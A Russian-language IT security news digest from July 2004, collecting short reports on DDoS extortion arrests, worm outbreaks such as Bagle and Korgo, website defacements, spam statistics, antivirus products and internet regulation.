РИА "Новости" сообщает. В результате совместной операции сотрудников британской Национальной службы по борьбе с преступлениями в сфере высоких технологий и их российских коллег были арестованы главные члены российской преступной группы, занимавшейся вымогательством и отмыванием денег. "В ходе серии облав, проведенных 20 и 21 июля в Санкт-Петербурге, Ростовской и Ставропольской областях, были задержаны 9 человек, подозреваемых в том, что путем шантажа им удалось незаконно получить у владельцев онлайновых букмекерских контор сотни тысяч фунтов стерлингов", - сообщили в пресс-службе британского посольства. Сначала хакеры устраивали компьютерные атаки, из-за которых блокировались серверы компаний, что влекло многомиллионные убытки. Затем шантажисты направляли владельцам письмо с требованием определенной суммы денег в обмен на прекращение атак. Успех этой операции стал возможен благодаря международному сотрудничеству между правоохранительными органами и деловыми кругами обеих стран. В России британская Национальная служба тесно сотрудничала со Следственным комитетом МВД РФ и специальным управлением МВД по борьбе с преступлениями в области высоких технологий.
rian.ru

22/07/2004 15:07 Передача данных в сотовых сетях набирает популярность
К 2005 году 41% абонентов мобильной связи будут регулярно и в больших объемах обмениваться данными через сотовые сети, утверждает исследовательская фирма Mobinet. Это в четыре раза больше, чем в 2003 г. Резкий рост интереса к таким услугам произойдет после увеличения скорости передачи данных, повышения уровня безопасности и снижения тарифов. Наибольший интерес абоненты проявляют к мобильным играм, электронной почте, передаче фотографий, музыки и новостным сообщениям. Новостные сервисы способны выйти на массовый рынок, утверждает Mobinet. Выводы были сделаны на основе опроса 4,5 тысяч человек в 13 странах, проведенного консалтинговой компанией A.T.Kearney и Институтом менеджмента Judge при Кембриджском университете. О результатах исследования сообщил сайт Cellular News.
cnews.ru

22/07/2004 15:07 Выставка Softool 2004 пройдёт с 28 сентября по 2 октября
Российская ежегодная выставка информационных технологий Softool 2004 пройдёт с 28 сентября по 2 октября 2004 года в Москве во Всероссийском Выставочном Центре. Это мероприятие будет проводиться уже в 15 раз. В этом году выставка проходит под лозунгом "Готовые отраслевые решения - в экономику России". Год 15-летнего юбилея выставки отмечен фейерверком новых проектов. "ИТ в медицине и фармации"; "Linux Land"; "ИТ-аутсорсинг в России"; "DOCFLOW на Softoolе", "Мир Академии", консалтинговый центр, оказывающий консультации посетителям выставки по выбору систем автоматизации управления, VIP-конференции по разделам САПР, АСУТП и технологиям управления, конкурсы на лучшие решения в различных направлениях информационных технологий, - это далеко не полный перечень мероприятий, которые готовит Softool своим участникам и посетителям.
cnews.ru

22/07/2004 15:06 Менеджеры проектов слушают рок
Новость, не относящаяся к безопасности, скорее из разряда курьезов. "Вебпланета" рассказыват о проведенном соц. опросе среди ИТ специалистов по поводу их пристрастий в музыке. Были получены любопытные результаты. Невероятно, но музыкальные предпочтения сертифицированных Microsoft специалистов, менеджеров проектов или, например, линуксоидов резко отличаются друг от друга! Каждый из них слушает свою музыку. Непонятно, то ли работа сказывается на музыкальных пристрастиях, то ли стиль музыки определяет выбор профессии. Оказалось, что у Microsoft-сертифицированных профессионалов любимый жанр стандартный поп; у работников в области безопасности - «альтернативный» рок 60-х; у линуксоидов любимый жанр электро; у разработчиков - тяжелый металл; у администраторов БД - жанр «инди»; у менеджеров проектов - рок; а CIO и ИТ-директора любят классику. А какую музыку предпочитаете вы? :)
webplanet.ru

22/07/2004 15:06 Британские интерент-провайдеры борятся с детской порнографией
РИА "Новости" сообщает. Британская телекоммуникационная компания BT Group ежедневно блокирует более 23 тысяч попыток клиентов войти на сайты, содержащие детскую порнографию, заявил во вторник представитель компании Джайлз Диардз. "Мы были поражены количеством таких попыток", - сказал Диардз. Как передает Рейтер, представитель компании добавил, что ограничение доступа на такого рода сайты увеличивается по мере того, как компания совершенствует установленное ею фильтрующее оборудование. О намерении установить улучшенные фильтры, блокирующие доступ к порнографии в Интернете, BT объявила месяц назад. Это начинание получило поддержку британских парламентариев. Распространение детской порнографии в Интернете стало одной из самых крупных сфер киберпреступности. Однако установка фильтрующего оборудования пока не становится обязательной для всех интернет-провайдеров в Британии. По мнению защитников свободы слова, частные фирмы не должны принимать такого рода блокирующие меры без соответствующей законодательной поддержки.
rian.ru

22/07/2004 15:05 Читать чужие письма можно и за деньги
Озабоченность крупных компаний содержанием исходящей электронной почти достигла сегодня такого уровня, что руководство готово нанимать сотрудников, обязанности которых сводятся к чтению писем остальных работников. Как сообщает издание Silicon.com, ссылаясь на данные исследования Forrester Consulting, 44% крупных корпораций в США уже оплачивают труд «шпионов», непрерывно просматривающих отправленные письма. Еще 48% признались, что проводят регулярные ревизии корреспонденции служащих. Исследование, проведенное по заказу Proofpoint, выявило мотивы е-mail паранойи работодателей — в основном, это боязнь утечки конфиденциальной или другой важной информации, например, коммерческой тайны (у 71%) или данных, являющихся предметом интеллектуальной собственности (у 76% опрошенных).
webplanet.ru

22/07/2004 15:04 Обзор спама и вирусов в июне
"Вебпланета" опубликовала статистику по вирусам и спаму за июнь этого года. Вот такие результаты были представлены: Доля спама в почтовых ящиках неуклонно растет. В июне, согласно данным Symantec/Brightmail Probe Network 65% всех электронных писем были спамом, когда в июне 2003 года доля спама составляла 49%. Тематика спама за последний месяц практически не изменилась. Выросла только категория «Продукция», ее доля в общем количестве спама возросла с 22% до 25%, сообщает ClickZ. Основные виды продукции, которые рекламировались спамом в первой половине 2004 года были такие: Лекарства — 29.53%; Рефинансирование — 9.68%; Увеличение пениса — 7.05%; Шоппинг — 6.86%; Софт — 6.11% и т.д. Вирусы тоже не дремлют. Вирусные атаки, нацеленные на сбор электронных адресов, увеличились на 5,4% в июне по сравнению с майскими значениями. Из наиболее популярных вирусов такие: netsky, zafi, mime, objectdata, sober, bagle, lovgate, klez, и т.д.
webplanet.ru

22/07/2004 15:04 На Украине создан домен второго уровня
На Украине создан новый публичный домен второго уровня .in.ua, предназначенный для регистрации доменных имен частными лицами — жителями Украины. По словам Игоря Дядюры, представителя компании-администратора нового домена, название домена — это сокращение от INdividual (физическое лицо), или Individual Name. Подобные домены уже созданы и работают в других странах, к примеру, в России — .pp (private person), в Великобритании — .me (me — "Я"), во Франции — .nom и т.д. Несмотря на то, что целевой аудиторией нового домены определены физические лица, правила не запрещают зарегистрировать доменное имя в этой зоне и юридическим лицам. В настоящее время домен проходит тестирование. Эксплуатация домена и регистрация доменных имен в зоне .in.ua начнутся с 1 сентября.
webplanet.ru

22/07/2004 15:03 20% рынка SMS-услуг контролируют пираты
Представители операторов сотовой связи и музыкальных издательств совместно с провайдерами развлекательных услуг обсудили новые возможности продажи SMS-пространства и перспективы развития телекоммуникаций. Выяснилось, что главная проблема на этом рынке — пираты, на долю которых приходится каждый пятый логотип и мелодия, пишут «Новые известия». В настоящее время в мире отправляется более 30 млрд. SMS-сообщений. Отправив сообщение с определенным набором цифр на определенный номер, можно загрузить на свой телефон картинку или мелодию. Потребителя мало волнует, лицензионная картинка или мелодия или нет. Специалисты оценивают потери, которые официальные компании несут от пиратов, примерно в 20% всего объема рынка. Он в свою очередь оценивается десятками миллионов долларов.
webplanet.ru

22/07/2004 15:02 Panda Software выпустила обновление против вируса Bagle.AH
Компания Panda Software обнаружила появление нового червя Bagle.AH (W32/Bagle.AH.worm), вредоносного кода, использующего для распространения как почту, так и программы обмена файлами, такие как Kazaa, Morpheus, e-mule или LimeWire. Начиная со второй половины 19 июля, лаборатории Panda Software получают большое количество отчетов о заражениях данным вирусом. Технологии Panda Software TruPrevent, находящиеся в стадии бета тестирования и доступные по адресу http://www.pandasoftware.com/beta, официально будут выпущены 29 июля. Данные инновационные технологии разработаны для поведенческого анализа, который позволит блокировать атаки таких вирусов как Bagle.AH и станет отличным дополнением к традиционным антивирусам, сообщает сайт компании.
viruslab.ru

22/07/2004 15:02 Открылся новый ресурс FreeWiFi.Ru
Известный интернет-деятель Руслан Курепин открыл новый полезный ресурс, посвященный точкам WiFi-доступа (хот-спотам) на территории России. На сайте FreeWiFi.Ru собирается и каталогизируется информация обо всех возможных российских хот-спотах. Пока ресурс содержит информацию всего о нескольких десятках точек доступа в Москве и Питере, причем все эти точки «цивилизованные», то есть не подразумевают неавторизованного подключения к чей-то дырявой сети. По каждому хот-споту можно узнать исчерпывающую информацию: адрес, условия пользования, поддерживаемые протоколы. Кроме того, любой сетеход может оставить свой комментарий и выразить свое личное отношение к тому или иному хот-споту.
webplanet.ru

21/07/2004 18:35 США призывают Россию ужесточить борьбу с компьютерными пиратами
Международный альянс интеллектуальной собственности (International Intellectual Property Alliance (IIPA) обратился к президенту Соединенных Штатов Джорджу Бушу с просьбой отменить льготный торговый режим для России в случае, если она к октябрю текущего года не достигнет ощутимых результатов в борьбе с пиратством, заявив при этом, что Россия постепенно становится одним из крупнейших в мире экспортеров пиратских копий на оптических носителях. Замминистра торговли США Уильям Лэш призвал власти России ужесточить ответственность за нарушение прав интеллектуальной собственности. "Постоянное закрытие "пиратских" производств и реальные приговоры "пиратам", предусматривающие для них тюремное заключение - вот что требуется от России и в соответствии с международными правовыми стандартами и в соответствии с двусторонним российско-американским торговым соглашением", - заявил Уильям Лэш, посетовав на колоссальные масштабы "пиратского" производства в России.
crime-research.ru

21/07/2004 18:10 Шесть антивирусных компаний подтвердили опасность эпидемия червя I-Worm.Bagle.ai.
Сразу шесть антивирусных компаний подтвердили опасность эпидемия червя I-Worm.Bagle.ai. Основываясь на их сообщениях, секьюрити компания Secunia выпустила вчера извещение о угрозе эпидемии. Хотя опасность оценивается как "средняя", TREND MICRO, NETWORK ASSOCIATES, SOPHOS, F-SECURE, SYMANTEC и COMPUTER ASSOCIATES одтвердили опасность червя. Напомним, что "Лаборатория Касперского" также сообщала об угрозе. I-Worm.Bagle.ai имеет несколько алиасов, среди них: W32.beagle.AG.mm, Bagle.AE,W32.Beagle.AG@mm, Win32/Bagle.Variant.Worm, и др. Первое сообщение о этой разновидности червя появилось 19 июля. Червь арспространяется по email и через p2p сети. Использует свою реализацию SMTP для рассылки инфицированных писем, открывает на зараженной машине "бек-дор" на 1080 порту.
secunia.com

21/07/2004 14:31 Новые возможности Gmail
Компания Google добавила в свою почтовую службу Gmail несколько новых функций из числа тех, о которых особенно просили бета-тестеры. Теперь в почтовый аккаунт Gmail можно импортировать адресные книги Outlook и Outlook Express, а также служб MSN Hotmail, Yahoo Mail и любых других почтовых программ и онлайновых служб, поддерживающих экспорт адресных книг в формате CSV. Вторая новая функция - это возможность автоматического добавления подписи в конец писем. Наконец, Gmail теперь доступна и пользователям браузера Safari, который поставляется с последними версиями Mac OS. Для работы с почтовым ящиком Google требуется Safari версии 1.2.1 или старше.
compulenta.ru

21/07/2004 14:30 Silicon Graphics создаст новый Linux-кластер
Компания Silicon Graphics построит самый быстрый кластер, работающий на базе операционной системы Linux, для Национального центра суперкомпьютерных приложений (NCSA). Кластер под названием Cobalt на платформе Altix объединит 1024 процессора Intel Itanium 2 и будет использовать 3 ТБ распределенной памяти. Новый кластер Cobalt предоставит ученым недоступные ранее вычислительные возможности для проведения исследований в области космологии и составления прогнозов погоды. Машина будет использовать единый образ Linux (основанный на Red Hat Enterprise Linux) для всех 1024 процессоров, что позволит выделить больший объем памяти под запуск приложений и вычисления, а также повысит общее быстродействие суперкомпьютера. Cobalt будет использовать систему хранения данных InfiniteStorage от SGI объемом 370 ТБ, которая будет также соединена с другими кластерами центра NCSA. Потенциальная пиковая производительность Cobalt должна составить 6 Тфлоп.
cnews.ru

21/07/2004 14:30 Методика сбора и закрепления доказательств по делам о нарушении авторских и смежных прав
Центр исследования компьютерной преступности (crime-research.ru) опубликовал материал под таким заголовком. В статье рассматривается закон Украины «Об авторском праве и смежных правах». Возможности пользователя сети Интернет по мгновенному копированию и передаче информации на любые расстояния независимо от границ и территориальной юрисдикции государств позволяют устанавливать совершенно новые отношения посредством неведомых прежде инструментов, отличающиеся от привычных аналогов. Естественно, следом за размещением авторских произведений в Интернете встали проблемы охраны и защиты авторского права, нуждающиеся в новых правовых механизмах регулирования. Поэтому юристам очень важно найти такие правовые механизмы, которые обеспечат правовую охрану и защиту авторских прав в Интернете, не ограничивая возможности автора использовать Интернет для распространения своих произведений и прав других на получение и использование информации.
crime-research.ru

21/07/2004 14:29 Школьники создали недорогой детектор мобильников
Учащиеся Кентерберийского колледжа в г. Кристчерч (Новая Зеландия) разработали недорогой по сравнению с имеющимися аналогами детектор, способный находить работающие поблизости мобильные телефоны. Разработка школьников, получившая название CellTrac-r, привлекла к себе огромный интерес не только в Новой Зеландии, но и за рубежом. Детектор регистрирует скрытную работу мобильных телефонов по всплескам радиочастотных сигналов, которые излучает мобильник всякий раз при входящем или исходящем звонке, а также при приеме или отправлении текстового сообщения. Радиус работы устройства составляет 30 метров. По амплитуде сигнала прибор способен определить примерное расстояние до телефона.
cnews.ru

21/07/2004 14:29 Red Hat готовится к экспансии в Россию
Рынок программного обеспечения с открытыми исходными текстами в России активно развивается, опережая многие смелые прогнозы. Именно благодаря этому топ-менеджеры компании Red Hat, одного из ведущих мировых разработчиков Linux-систем, 19–20 июля этого года впервые посетили Россию, что говорит о существенном увеличении внимания компании к нашей стране. Ранее Red Hat работала в России только через своих партнёров, прежде всего — санкт-петербургскую компанию «Линукс Инк». Но теперь, по мнению Алекса Пинчева, вице-президента Red Hat, кстати, выходца из Петербурга, пришло время создать представительство Red Hat в России. Также будет обеспечена поддержка на русском языке, доступная для всех клиентов компании в мировом масштабе. Также Red Hat рассмотрит возможность перенести в Россию часть своей разработки ПО. Red Hat рассматривает различные варианты аутсорсинга; некоторые разработки уже ведутся в Чешской Республике, но взгляд компании обращён и к другим странам, включая Россию.
cnews.ru

21/07/2004 14:28 Раскрыто дело российской интернет-мошенницы
Пять тысяч долларов за полгода переписки по интернету выманила у состоятельного 40-летнего австралийца 18-летняя студентка, сообщает «Итар-Тасс». Мошенница познакомилась с жертвой при помощи одного из сайтов знакомств. Иностранец переводил ей деньги, чтобы она могла прилететь в Австралию и выйти за него замуж. Однако этого не произошло. Поняв в конце концов, что его дурачат, австралиец обратился в Интерпол с просьбой помочь вернуть деньги. Разыскать несостоявшуюся «невесту» уже удалось, сообщил сегодня начальник филиала Интерпола в Тульской области Александр Котелев. Ей оказалась студентка из Йошкар-Олы. Ей будет предъявлено обвинение в мошенничестве. По словам Котелева, мошенничество через интернет относится к числу трудно раскрываемых преступлений. Он советует всем, кто ищет «свою половину» с помощью всемирной паутины, быть максимально осмотрительными.
webplanet.ru

21/07/2004 14:27 Семинар «Интернет-статистика Spylog от А до Я»
Spylog открывает серию семинаров по интернету. Первым семинаром в цикле семинаров для начинающих станет «Интернет-статистика Spylog от А до Я». На семинаре слушатели научатся основным принципам анализа интернет-статистики.Слушатель семинара также научится считать эффективность своих действий и проводить простые маркетинговые исследования в интернете. Также Spylog совместно с компанией «Ашманов и партнеры» 25–26 августа проведут семинар «Оптимизация сайта для Яндекса, Рамблера, Google». Кроме того, компании проведут двухдневный семинар в Санкт-Петербурге, посвященный продвижению сайтов в интернете.
webplanet.ru

21/07/2004 14:27 Антивирусы Trend Micro пришли в Россию
Антивирусные программы компании Trend Micro впервые стали доступны для легального приобретения в России. Эти программы получили множество наград и неоднократно признавались лучшим в мире корпоративным антивирусным ПО. В частности, решения Trend Micro в области антивирусной защиты используются такими всемирно известными компаниями как: Canon, SAP, Toshiba, PepsiCo, British Airways, ExxonMobil, DHL, NTT Telecom, Hilton Hotels, Charles Schwab, Fidelity Investments и др. Теперь программы всемирно известной компании можно купить и в России.
webplanet.ru

20/07/2004 17:35 Microsoft и Lindows все-таки договорились
Как сообщает bugtraq.ru, в обмен на 20 миллионов долларов Lindows согласилась к 14 сентября окончательно переименоваться в Linspire и прекратить использовать название Lindows в своих продуктах. Microsoft будут переданы домены lindows.org и lindowsos.com, в то время как передача lindows.com и lindowsinc.com отложена до 15 июля 2008, до тех пор они будут перенаправлять пользователей на сайт Linspire.
infoworld.com

20/07/2004 14:05 Китайские власти объявили "народную войну" порнографии в Интернете
Власти Китая через говударственные СМИ объявили "народную войну" порнографии в Интернете и определили для китайских интернет-сайтов срок до сентября, за который они должны убрать весь "недостойный" матариал со своих серверов. Как сообщает агентство France-Presse со ссылкой на газету Cina Daily, "народная война" организована по указанию непосредственно главы китайского государства Ху Цзиньтао. По подсчетам государственных чиновников, в Китае существует как минимум 500 сайтов, содержащих порнографические материалы. В выявлении других подобных сайтов властям помогают китайские граждане, которые сообщают о фактах наличия порнографии через Интернет. Отмечается, что борьба с порнографией проводится в рамках государственной кампании по улучшению морального облика жителей страны и является одной из мер по контролю за содержимым Интернета. Как известно, китайские власти жестко ограничивают доступ к интернет-ресурсам для граждан, и в последнее время усилили контрольные меры в свете быстро растущей популярности глобальной сети.
lenta.ru

20/07/2004 14:01 На Украине снизят цены на Интернет
Государственный комитет по связи и информатизации Украины планирует снизить цены на каналы связи ключевого украинского провайдера - компании "Укртелеком". Изменение ценовой политики планируется в сентябре нынешнего года. Под снижение попадут те услуги, которые "Укртелеком" предоставляет для других операторов и провайдеров. Фактически, это может стать толчком к снижению цен на Интернет у вторичных провайдеров.
internet.ru

20/07/2004 14:00 Вышел Panda ISASecure Antivirus для ISA Server 2004
Компания Panda Software объявила о выходе продукта Panda ISASecure Antivirus для серверов Microsoft Internet Security and Acceleration (ISA) Server 2004. Продукт разработан для крупных и средних предприятий, имеющих многоплатформенные сетевые ресурсы, и для компаний, которым требуется централизованное управление сетевой защитой посредством выработки и настройки политик безопасности. Panda ISASecure Antivirus содержит в себе защиту для сервера ISA Server 2004, возможности безопасного доступа, дополнительной проверки и просеивания сетевого трафика с помощью веб-фильтра (ISAPI) или программного фильтра. Предлагается также возможность проверки и лечения файлов всех форматов, получаемых и отправляемых через протоколы HTTP и SMTP. Panda ISASecure Antivirus дополняет защиту межсетевого экрана и прокси-сервера на сервере ISA Server 2004.
compulenta.ru

20/07/2004 13:59 В Петербурге разработана OCR-система с открытым кодом
Группа сотрудников факультета Прикладной Математики-Процессов Управления Санкт-Петербургского государственного университета при поддержке компании Digital Design разработала начальную версию продукта с открытым кодом для распознавания графических изображений "Система распознавания текстов". Идея разработать открытую программу распознавания текста возникла на факультете ПМ-ПУ как продолжение научных исследований, ведущихся на факультете. «Практическое значение этой идеи очевидно, - утверждает директор Департамента развития и исследований Digital Design Владимир Габриель. - Несмотря на наличие большого количества программных продуктов для распознавания текста, на рынке нет программ с открытым кодом, позволяющих встраивать функции распознавания текста в программные системы, разработанные независимыми производителями. И наша компания видит для себя определенные перспективы в поддержке реализации этих исследований».
cnews.ru

20/07/2004 13:58 «Белтелеком» взломали
Вечером 17 июля, в субботу, сайт белорусского республиканского объединения «Белтелеком» был взломан. На первой странице сайта в разделе «Новости» появилась такая надпись: «Этот сайт был взломан ~Kokain~’ом. This site was hacked by ~Kokain~. Могу сказать как — мыльте на 25925@mail.ru!» Дежурные администраторы быстро обнаружили взлом, однако в выходные дни не смогли устранить его последствия. На протяжении всего воскресенья сайт белорусского провайдера-монополиста был недоступен. Сложно сказать, как хакер получил доступ к серверу «Белтелекома» — чуть ли не главному серверу белорусского интернета. Вполне возможно, что Kokain использовал дыры в системе управления сайтом. Очевидно, впрочем, что хакер не получил полного доступа к сайту. Если интересуют подробности — можно обратиться к нему лично, благо он оставил свой email :).
webplanet.ru

20/07/2004 13:58 Хакер взломал сайты Пентагона
Двадцатилетнему жителю Калифорнии Роберту Литтлу (Robert Lyttle), арестованному за несанкционированное проникновение в компьютеры федеральных органов власти США, в том числе двух агентств, входящих в структуру Пентагона, грозит до 10 лет лишения свободы и штраф в размере до $250 тыс. Злоумышленник изменял внешний вид страниц на веб-сайтах серьезных ведомств. Роберт Литтл, известный под псевдонимом Pimpshiz, на прошлой неделе был обвинен Федеральным большим жюри в противозаконном проникновении в правительственные компьютеры, имевшем место в апреле 2002 года. Государственное обвинение было вынесено управлением компьютерных преступлений и интеллектуальной собственности генеральной прокуратуры США, расследование велось силами ФБР, службы расследований уголовных преступлений министерства обороны и специалистами центра им. Эймса НАСА.
cnews.ru

20/07/2004 13:58 В Киргизии принят закон об электронной цифровой подписи
Президент Киргизской Республики Аскар Акаев после двухлетнего периода обсуждения и рассмотрения его парламентом подписал закон "Об электронной цифровой подписи", сообщили РБК в пресс-службе Министерства транспорта и коммуникаций КР. Закон, совместно с уже принятым законом "Об электронных платежах" должен ускорить внедрение электронной коммерции в республике, как это давно уже практикуется в развитых странах. Законом устанавливаются правовые основы для использования электронных цифровых подписей (ЭЦП) в процессах обмена электронными сообщениями, при соблюдении которых такая подпись признается равнозначной собственноручной подписи. Нормами закона установлены принципы и условия использования и предоставления услуг по удостоверению электронных цифровых подписей. Также законом устанавливается порядок использования такой подписи в сфере госуправления, корпоративных информационных сетях и платежной системе Киргизии.
cnews.ru

20/07/2004 13:57 Антиспам на Mail.Ru фильтрует спам-картинки
19 июля на серверах компании Mail.Ru было закончено внедрение и тестирование новой версии фильтра Kaspersky Anti-Spam, созданного совместно «Лабораторией Касперского» и компанией «Ашманов и партнеры». Система содержит улучшенные технологии фильтрации графического спама, что позволяет эффективно бороться с нежелательной рекламой, спрятанной в файлах формата gif, bmp и jpg. Графический спам появился в массовых масштабах в российской сети около года назад. Это был ответ спамеров на развитие методов фильтрации по тексту сообщений.Первые графические фильтры были внедрены в почтовой системе Mail.Ru в августе 2003 г. Однако, уже через несколько месяцев спамеры научились использовать «мутирующие изображения». Для решения этой проблемы в антиспам-фильтры на Mail.Ru была внедрена технология нечеткого сравнения изображений, игнорирующая внесенный спамерами «графический шум». Новая версия системы использует эвристические алгоритмы, созданные на основе многолетнего анализа спам-изображений. Применяемая технология анализа графики пригодна и для работы с другими бинарными вложениями. В частности, она позволяет избавляться от некоторых сетевых червей.
webplanet.ru

20/07/2004 13:56 Эпидемия червя I-Worm.Bagle.ai
"Лаборатория Касперского" сообщает об обнаружении новой версии почтового червя I-Worm.Bagle.ai. Файл червя имеет 20-30 КБ и упакован PEX. Червь распространяется по электронной почте в качестве вложения, а также по P2P сетям. Вложение сообщения электронной почты может быть как исполняемым файлом, так и архивом, защищенным паролем. Тема зараженных сообщений "Re:". При запуске червь копирует себя в системную директорию под именем "winxp.exe" и ставит ссылку на этот файл в раздел автозагрузки реестра. Срочное обновление баз данных Антивируса Касперского для защиты от I-Worm.Bagle.ai уже выпущено. Опасность эпидемии -средняя. Подробное описания червя I-Worm.Bagle.ai опубликовано в "Вирусной энциклопедии".
viruslist.ru

19/07/2004 13:49 Korgo.U продолжает распространяться
Секьюрити компания Secunia выпустила предупреждение об атаке вируса Korgo.U. И хотя степень атаки оценивается как "средняя" (MEDIUM RISK attak), три компании - разработчика антивирусов: F-SECURE, PANDA ANTIVIRUS и COMPUTER ASSOCIATES подтвердили опасность. Первое сообщение о Korgo.U (известен также под названием Padobot.m) появилось 24 июня 2004. Korgo.U похож на предыдущие варианты вируса; он использует уязвимость Microsoft Windows LSASS для проникновения в систему, соединяется с несколькими веб-узлами, куда отсылает информацию о локальной системе и загружает оттуда некоторые файлы. Он также открывает бек-дор, позволяющий злоумышленнику получить доступ к зараженной машине.
secunia.com

19/07/2004 13:43 О проблеме государственного регулирования Интернет
Центр исследования компьютерной преступности (crime-research.ru) опубликовал материал посвященный этой теме. В нем говорится, что свыше двадцати государств мира приняли законодательные акты, регулирующие общественные информационные отношения, возникающие в связи с использованием сети Интернет. Проблема государственного регулирования глобальной компьютерной Сети включает в себя многие вопросы, в том числе юрисдикции сети Интернет, суверенитета государств в информационном пространстве и тд. Поднимаются вопросы связанные с пробелами и противоречиями в ныне действующем законодательстве России и Украины.
crime-research.ru

19/07/2004 13:41 Новый интернет-червь – дело рук Аль-Каеды?
Загадочный троян, «засыпающий» при первом же соприкосновении с антивирусным сканером, возможно, был создан по заказу исламистской террористической организации Аль-Каеда. По крайней мере, так пишет ZDNet UK, ссылающийся на данные румынской компании BitDefender. Речь идет об одном из штаммов вируса Atak, умеющего тихо «ложиться на дно» в момент запуска антивирусной программы. У сотрудников компании есть основания предполагать, что автором «умного» вируса стал симпатизирующий террористам программист, пообещавший выпустить на свободу деструктивного червя в случае, если американцы начнут вторжение в Ирак. Судя по всему, неизвестному герою потребовалось целых полтора года, чтобы перебороть свою лень и привести в исполнение эту угрозу. Как полагает пресс-секретарь BitDefender, обнаруженный в минувшую пятницу «супер-червь» Atak.B был создан живущим в Малайзии программистом Владимором Чамлковичем (Vladimor Chamlkovic), известным среди коллег под кличкой Melhaker. Директор финской антивирусной компании F-Secure Микко Хиппинен (Mikko Hyppinen) разделяет эту точку зрения, однако сомневается в том, что Чамлкович имеет какое-либо отношение к Аль-Каеде. Что же касается собственно Atak.B, то это – распространяющийся с помощью спам-технологий интернет-червь, основная задача которого состоит в том, чтобы вывести из строя известные ему средства антивирусной защиты и брандмауэры, открыть в системе черный вход и передать захваченный компьютер своему хозяину. Так же, как и его предшественник, Atak.B уклоняется от обнаружения антивирусными мониторами, погружаясь в глубокий сон.
internet.ru

19/07/2004 13:37 "Россия-Он-Лайн" выпустила свой компьютер
Крупнейшие итернет провайдеры ведут борьбу за пользователей различными способами. Интернет-провайдер РОЛ начинает распространение в России специального компьютера под собственным брендом для пользователей Интернет. Разработан "РОЛ-бокс" и изготовлен фирмой Intel. Он поставляется с предустановленным программным обеспечением, включающим в себя: лицензионную операционную систему Windows XP, "Антивирус Касперского", программу автоматического соединения с Интернетом, энциклопедию "Кругосвет". Компьютер снабжен встроенным телефоном. Покупателям предоставляется 3 месяца доступа в Интернет от интернет-провайдера РОЛ (в рамках тарифного плана РОЛ-10), - передает <<БИТ ПРАЙМ-ТАСС. Цена "РОЛ-бокса", включая НДС, 9 900 руб. Гарантия – 1 год.
internet.ru

19/07/2004 13:34 Новое устройство: WiFi-шпион
Компания Marware выпустила новое устройство - детектор WLAN-сетей. Небольшое, размером с брелок для ключей, устройство WiFi Spy позволяет обнаружить работающую WLAN-сеть и показать качество приема сигнала. Первое, что приходит на ум - настоящая находка для любителей "уокчокинга" (walkchalking) - модного увлечения по поиску открытых WLAN-сетей, в которые может проникнуть, в буквальном смысле, "человек с улицы". С WiFi Spy не придется колесить по городу с работающим ноутбуком: компьютер можно будет включить только тогда, когда замигает лампочка детектора (сам он, естественно, определить степень защищенности сети не в состоянии). Есть у WiFi Spy и более мирные применения. Он поможет найти ближайшее место, где можно выйти в интернет через WLAN, а системные администраторы с его помощью смогут составить точную карту покрытия беспроводной сети своей компании. В отличие от аналогичного WiFi Sniffer, который мог работать со всей группой стандартов 802.11, WiFi Spy может определять только сети стандартов IEEE 802.11b и 802.11g, использующие частоту 2,4 ГГц. Вероятно, в Marware решили, что раз популярность 802.11a не слишком велика, в детектор не стоит встраивать поддержку пятигигагерцевого диапазона.
compulenta.ru

19/07/2004 13:31 Программист преследуется за взлом защиты "1С:Предприятия"
Compulenta сообщает. Продолжается развитие событий вокруг конфликта компании "1С" и программиста Сергея Давыдюка, известного под псевдонимом Соболь. На днях ожидается предъявление обвинения, а там и до слушаний по существу уже недалеко. По всей вероятности, программиста обвинят по статье 273 УК РФ - создание вредоносных программ. История Соболя во многом похожа на конфликт Дмитрия Склярова с компанией Adobe. На этот раз действующим лицом выступает уже не американская Adobe, а российская компания "1С". Соболь написал бесплатный эмулятор аппаратного HASP-ключа, используемого для защиты "1С:Предприятие", и обновлял эмулятор по мере появления новых версий продукта "1С". Предупреждения о том, что его деятельность незаконна, Соболь игнорировал, и в результате, после нескольких обысков и допросов против него возбуждают дело. Аппаратный HASP-ключ является основой системы защиты "1С:Предприятия" от нелегального копирования. Без него программа работать не будет. Эмулятор Соболя представляет собой программу, которая ломает защиту программы от "1С". Разумеется, им могут пользоваться (и воспользовались) пираты, однако он может оказаться полезен и легальным пользователям "1С:Предприятие". Дело в том, что аппаратный ключ иногда конфликтует с периферийными устройствами, подключенными к портам компьютера, например, с некоторыми моделями принтеров и сканеров. Для владельцев таких устройств эмулятор ключа - единственный способ запустить "1С:Предприятие". В компании "1С" от комментариев воздерживаются, сообщая что-либо конкретное можно будет сказать только после судебного слушания.
compulenta.ru

19/07/2004 13:30 Duts: вирус для Windows CE
Лаборатория Касперского сообщает о обнаруженном новом вирусе для Windows CE. WinCE.Duts.a - первый вирус для карманных компьютеров, работающих под управлением Windows CE .NET. Об авторстве можно судить по строке, содержащейся в теле вируса: WinCE4.Dust by Ratter/29A. Группа 29А не единожды прославилась на ниве создания концептуально новых вредоносных программ (в частности, первого червя для мобильных телефонов Worm.SymbOS.Cabir.a). Вирус представляет собой программу для процессора ARM длиной в 1520 байт. При запуске программа вежливо спрашивает у пользователя разрешения размножиться, выводя диалог. При положительном ответе происходит заражение подходящих по формату (процессор ARM) и размеру (>4kb) исполняемых файлов в корневой директории устройства (My device). Вирус дописывает себя в конец последней секции файла и устанавливает точку входа на свое начало. Зараженные файлы помечаются сигнатурой 'atar' в одном из неиспользуемых полей PE-заголовка. Вирус работает на устройствах под управлением ОС PocketPC 2000, PocketPC 2002, PocketPC 2003.
viruslist.ru

19/07/2004 13:30 Исчезновение компьютерных дисков парализовало работу американского ядерного центра
Работа американского ядерного центра в Лос-Аламосе полностью парализована. Ученым пришлось приостановить все проводимые исследования. Такое происходит впервые за всю историю существования центра, в котором была создана первая американская атомная бомба, сброшенная в 1945 году на Японию. С тех пор Лос-Аламос играет ключевую роль в ядерных военных исследованиях, проводимых правительством США. Причиной приостановки всех научных работ стало таинственное исчезновение двух компьютерных дисков, на которых хранилась строго засекреченная информация. Американские ядерщики даже боятся намекнуть, какого характера это были данные. Территорию центра в Лос-Аламосе тут же заполонили агенты Секретной службы США и ЦРУ. К каждому сотруднику центра приставлена личная охрана. Как сообщает телекомпания Си-эн-эн, спецслужбы полагают, что диски пока находятся в Лос-Аламосе. Попытки вынести их за пределы ядерного центра были бы зафиксированы. Остается добавить, что он занимает территорию почти 70 квадратных километров. В центре работают около 12 тысяч человек.
crime-research.ru

19/07/2004 13:29 Недельный отчет Panda Software
